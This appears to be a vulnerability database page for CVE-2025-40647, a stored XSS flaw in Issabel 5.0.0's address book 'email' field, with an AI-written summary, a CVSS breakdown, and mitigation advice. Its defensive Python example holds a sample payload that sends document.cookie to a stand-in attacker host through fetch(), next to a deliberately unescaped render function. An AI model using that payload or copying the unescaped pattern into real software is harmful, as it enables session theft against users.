CVE-2025-40647
Description
Stored Cross-Site Scripting (XSS) vulnerability in Issabel v5.0.0, caused by a lack of proper validation of user input in the 'email' parameter of '/index.php?menu=address_book'.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in Issabel v5.0.0 allows authenticated users to inject malicious scripts via the 'email' parameter in the address book module.
Vulnerability
Overview
CVE-2025-40647 is a stored Cross-Site Scripting (XSS) vulnerability in Issabel version 5.0.0. The flaw resides in the address book functionality, specifically within the 'email' parameter at the path /index.php?menu=address_book. Due to insufficient input validation, an attacker can inject arbitrary JavaScript code that gets stored on the server and subsequently executed in the browsers of other users when they view the affected address book entry [1].
Exploitation
Details
The vulnerability requires an authenticated account with low privileges (PR:L) and only passive interaction from the victim (UI:P): the victim does not have to click anything, just open the page that renders the poisoned entry. An attacker with access to the address book stores a payload in the email field; when another user, including one with higher privileges, views that entry, the script runs in that user's browser with their session. The CVSS v4.0 base score is 5.1 (AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N). The vector scores no impact on the vulnerable system itself (VC:N/VI:N/VA:N); the low confidentiality and integrity impact is attributed to the subsequent system, i.e. the victim's browser session (SC:L/SI:L) [1].
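The following is an added example, not code from Issabel or from the advisory, illustrating the bug class described above: a stored value rendered into HTML without escaping, next to the two independent defences that close it (an allow-list check on write and context-aware HTML escaping on read), plus a small hunting helper that flags stored entries a strict validator would never have accepted. The address-book rows, the attacker payload and the `attacker.invalid` host are constructed for the example; the markup does not reproduce Issabel's actual templates.

```python
"""Added example (not Issabel's code): stored XSS via an unvalidated email
field, shown beside input validation and output encoding that neutralise it."""
import html
import re

# Conservative allow-list for the email field (an assumption for this example).
# Any production validator may be looser, but it must still reject
# '<', '>', '"' and "'", which are the characters that break out of HTML.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

# Constructed sample of what an address-book table might hold after a
# low-privileged user saved a malicious entry (row id 3).
ADDRESS_BOOK = [
    {"id": 1, "name": "Alice Example", "email": "alice@example.org"},
    {"id": 2, "name": "Bob Example", "email": "bob@example.org"},
    {
        "id": 3,
        "name": "Mallory",
        # Breaks out of the href attribute, then injects a script element.
        "email": '"><script>fetch("https://attacker.invalid/?c="+document.cookie)</script>',
    },
]


def validate_email(value: str) -> bool:
    """Allow-list check to apply on the write path, before the value is stored."""
    return bool(EMAIL_RE.fullmatch(value))


def render_row_vulnerable(entry: dict) -> str:
    """Mirrors the bug class: stored values are concatenated into HTML unescaped."""
    return (
        f'<td>{entry["name"]}</td>'
        f'<td><a href="mailto:{entry["email"]}">{entry["email"]}</a></td>'
    )


def render_row_fixed(entry: dict) -> str:
    """Same markup, but every stored value is escaped for the context it lands in.
    quote=True also escapes '"' and "'", which matters inside the href attribute."""
    name = html.escape(entry["name"], quote=True)
    email = html.escape(entry["email"], quote=True)
    return f'<td>{name}</td><td><a href="mailto:{email}">{email}</a></td>'


def contains_active_markup(rendered: str) -> bool:
    """Crude test oracle: does a live <script> start tag survive in the output?"""
    return "<script" in rendered.lower()


def find_suspicious_entries(rows) -> list:
    """Incident-response helper: ids of stored rows whose email field would not
    pass the allow-list, i.e. candidates for injected payloads."""
    return [row["id"] for row in rows if not validate_email(row["email"])]


if __name__ == "__main__":
    for entry in ADDRESS_BOOK:
        print("vulnerable:", render_row_vulnerable(entry))
        print("fixed:     ", render_row_fixed(entry))
    print("suspicious ids:", find_suspicious_entries(ADDRESS_BOOK))
```

In PHP, the language Issabel is written in, the equivalent write-side check is `filter_var($email, FILTER_VALIDATE_EMAIL)` and the read-side encoding is `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` applied at every point the value is echoed into HTML. Validation alone is not sufficient, since the same field may be rendered elsewhere or may already contain data stored before the fix; escaping on output is the control that actually prevents execution.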
Impact
Successful exploitation can lead to session hijacking, theft of data visible to the victim's session (for example anti-CSRF tokens read from the DOM, or session cookies if they are not flagged HttpOnly), or actions performed within Issabel on the victim's behalf using their privileges. The vulnerable system itself is scored with no direct impact; the low confidentiality and integrity impact in the CVSS vector (SC:L, SI:L) is borne by the subsequent system, the victim's browser session.
Mitigation
Status
Issabel has released a fix for this vulnerability in the issabel-pbx module version 5.0.0-2. Users are strongly advised to upgrade to at least this version. No workarounds are reported in the advisory [1]. On an RPM-based Issabel installation the installed release can be checked with `rpm -q issabel-pbx` (assuming the package carries that name); entries saved before the upgrade should also be reviewed, since a fix that validates input on write does not clean payloads already stored.
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Patches
No patches discovered yet.
References
News mentions
No linked articles in our index yet.